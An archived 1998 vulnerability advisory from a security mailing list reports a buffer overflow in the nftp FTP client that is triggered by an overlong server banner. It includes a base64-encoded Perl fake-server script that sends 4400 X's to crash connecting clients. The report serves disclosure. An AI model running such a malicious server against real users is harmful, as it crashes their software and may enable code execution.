This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. ---559023410-851401618-911263879=:29955 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: <Pine.GSO.3.96.981116175122.29955Dat_private> nftp is a shareware ftp program available at ftp://crydee.sai.msu.su/pub/comp/software/asv/nftp/ that is becoming more and more widely used. Cause: nftp incorrectly handles strings returned by the server. Tested: tested on version 1.40 linux-libc5 by sending 220 and 4400 X's followed by a \n (didn't work without the \n because it didn't get processed). 4400 was a random number, it has nothing to do with the exploitability of this program. Vulnerability: It appears to be an internal buffer that is being overfilled, but I do not have the source code, so I cannot tell. If it is an internal buffer, it may be possible to execute arbitrary code on the connecting computer, but they have to connect to the server, and they must be running this ftp proram. Fix: I do not have the source code so I can't create a patch =). It seems that too much trust is being put on the servers these days. I have included a sample crash. Put it in your inetd if you want to see for yourself. Creator Notified: The creator was notified shortly before sending this report. Fix available: not yet. -- Eric Wanner Head Systems Administrator FutureOne, Inc. 602-385-3379 http://home.futureone.com EfNet: holobyte Personal Email: holobyteat_private ---559023410-851401618-911263879=:29955 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="sample.pl" Content-ID: <Pine.GSO.3.96.981116175119.29955Bat_private> Content-Description: Content-Transfer-Encoding: BASE64 IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OkhhbmRsZTsNCnN0ZG91dC0+YXV0 b2ZsdXNoKCk7DQpwcmludCAiMjIwICI7DQpwcmludCAiWCJ4NDQwMDsNCnBy aW50ICJcbiI7DQpzbGVlcCAxMDA7DQo= ---559023410-851401618-911263879=:29955--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:38 PDT